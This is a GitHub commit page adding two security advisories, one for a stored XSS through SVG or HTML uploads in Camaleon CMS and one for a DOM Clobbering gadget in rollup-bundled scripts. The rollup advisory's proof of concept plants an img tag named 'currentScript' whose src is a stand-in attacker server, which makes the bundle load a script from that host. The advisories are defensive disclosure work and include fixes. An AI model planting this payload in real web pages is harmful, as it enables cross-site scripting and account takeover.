-
Notifications
You must be signed in to change notification settings - Fork 349
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
2345167
commit 8a8eaec
Showing
2 changed files
with
165 additions
and
0 deletions.
There are no files selected for viewing
65 changes: 65 additions & 0 deletions
65
advisories/github-reviewed/2024/09/GHSA-8fx8-3rg2-79xw/GHSA-8fx8-3rg2-79xw.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,65 @@ | ||
{ | ||
"schema_version": "1.4.0", | ||
"id": "GHSA-8fx8-3rg2-79xw", | ||
"modified": "2024-09-23T22:10:33Z", | ||
"published": "2024-09-23T22:10:33Z", | ||
"aliases": [ | ||
|
||
], | ||
"summary": "Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)", | ||
"details": "A stored cross-site scripting has been found in the image upload functionality that can be used by normal registered users: It is possible to upload a SVG image containing JavaScript and it's also possible to upload a HTML document when the format parameter is manually changed to [documents][1] or a string of an [unsupported format][2]. If an authenticated user or administrator visits that uploaded image or document malicious JavaScript can be executed on their behalf\n(e.g. changing or deleting content inside of the CMS.)\n\n[1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106\n[2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111\n\n## Impact\n\nThis issue may lead to account takeover due to reflected Cross-site scripting (XSS).\n\n## Remediation\n\nOnly allow the upload of safe files such as PNG, TXT and others or serve all \"unsafe\" files such as SVG and other files with a content-disposition: attachment header, which should prevent browsers from displaying them.\n\nAdditionally, a [Content security policy (CSP)][3] can be created that disallows inlined script. (Other parts of the application might need modification to continue functioning.)\n\n[3]: https://web.dev/articles/csp\n\nTo prevent the theft of the auth_token it could be marked with HttpOnly. This would however not prevent that actions could be performed as the authenticated user/administrator. Furthermore, it could make sense to use the authentication provided by Ruby on Rails, so that stolen tokens cannot be used anymore after some time.\n", | ||
"severity": [ | ||
{ | ||
"type": "CVSS_V3", | ||
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" | ||
}, | ||
{ | ||
"type": "CVSS_V4", | ||
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" | ||
} | ||
], | ||
"affected": [ | ||
{ | ||
"package": { | ||
"ecosystem": "RubyGems", | ||
"name": "camaleon_cms" | ||
}, | ||
"ranges": [ | ||
{ | ||
"type": "ECOSYSTEM", | ||
"events": [ | ||
{ | ||
"introduced": "0" | ||
}, | ||
{ | ||
"fixed": "2.8.1" | ||
} | ||
] | ||
} | ||
] | ||
} | ||
], | ||
"references": [ | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc" | ||
}, | ||
{ | ||
"type": "PACKAGE", | ||
"url": "https://github.com/owen2345/camaleon-cms" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml" | ||
} | ||
], | ||
"database_specific": { | ||
"cwe_ids": [ | ||
"CWE-79" | ||
], | ||
"severity": "MODERATE", | ||
"github_reviewed": true, | ||
"github_reviewed_at": "2024-09-23T22:10:33Z", | ||
"nvd_published_at": null | ||
} | ||
} |
100 changes: 100 additions & 0 deletions
100
advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,100 @@ | ||
{ | ||
"schema_version": "1.4.0", | ||
"id": "GHSA-gcx4-mw62-g8wm", | ||
"modified": "2024-09-23T22:11:02Z", | ||
"published": "2024-09-23T22:11:02Z", | ||
"aliases": [ | ||
"CVE-2024-47068" | ||
], | ||
"summary": "DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", | ||
"details": "### Summary\n\nA DOM Clobbering vulnerability was discovered in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nIt's worth noting that similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)) have been reported, which might serve as a good reference.\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n#### Gadget found in `rollup`\n\nA DOM Clobbering vulnerability in `rollup` bundled scripts was identified, particularly when the scripts uses `import.meta` and set output in format of `cjs`/`umd`/`iife`. In such cases, `rollup` replaces meta property with the URL retrieved from `document.currentScript`.\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the `rollup` to bundle up the program: `rollup main.js --format cjs --file bundle.js`.\n\n```\nvar s = document.createElement('script')\ns.src = import.meta.url + 'extra.js'\ndocument.head.append(s)\n```\n\nThe output `bundle.js` is shown in the following code snippet.\n\n```\n'use strict';\n\nvar _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;\nvar s = document.createElement('script');\ns.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';\ndocument.head.append(s);\n```\n\nAdding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n<!DOCTYPE html>\n<html>\n<head>\n <title>rollup Example</title>\n <!-- Attacker-controlled Script-less HTML Element starts--!>\n <img name=\"currentScript\" src=\"https://attacker.controlled.server/\"></img>\n <!-- Attacker-controlled Script-less HTML Element ends--!>\n</head>\n<script type=\"module\" crossorigin src=\"bundle.js\"></script>\n<body>\n</body>\n</html>\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes.\n\n### Patch\n\nPatching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.\n\n```\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =>\n\tgetResolveUrl(\n\t\t`'${escapeId(relativePath)}', ${\n\t\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t\t}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`\n\t);\n```\n\n```\nconst getUrlFromDocument = (chunkId: string, umd = false) =>\n\t`${\n\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t}(${DOCUMENT_CURRENT_SCRIPT} && ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' &&${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(\n\t\tchunkId\n\t)}', document.baseURI).href)`;\n```\n", | ||
"severity": [ | ||
{ | ||
"type": "CVSS_V3", | ||
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H" | ||
}, | ||
{ | ||
"type": "CVSS_V4", | ||
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N" | ||
} | ||
], | ||
"affected": [ | ||
{ | ||
"package": { | ||
"ecosystem": "npm", | ||
"name": "rollup" | ||
}, | ||
"ranges": [ | ||
{ | ||
"type": "ECOSYSTEM", | ||
"events": [ | ||
{ | ||
"introduced": "0" | ||
}, | ||
{ | ||
"fixed": "3.29.5" | ||
} | ||
] | ||
} | ||
] | ||
}, | ||
{ | ||
"package": { | ||
"ecosystem": "npm", | ||
"name": "rollup" | ||
}, | ||
"ranges": [ | ||
{ | ||
"type": "ECOSYSTEM", | ||
"events": [ | ||
{ | ||
"introduced": "4.0.0" | ||
}, | ||
{ | ||
"fixed": "4.22.4" | ||
} | ||
] | ||
} | ||
] | ||
} | ||
], | ||
"references": [ | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm" | ||
}, | ||
{ | ||
"type": "ADVISORY", | ||
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541" | ||
}, | ||
{ | ||
"type": "PACKAGE", | ||
"url": "https://github.com/rollup/rollup" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162" | ||
}, | ||
{ | ||
"type": "WEB", | ||
"url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185" | ||
} | ||
], | ||
"database_specific": { | ||
"cwe_ids": [ | ||
"CWE-79" | ||
], | ||
"severity": "HIGH", | ||
"github_reviewed": true, | ||
"github_reviewed_at": "2024-09-23T22:11:02Z", | ||
"nvd_published_at": "2024-09-23T16:15:06Z" | ||
} | ||
} |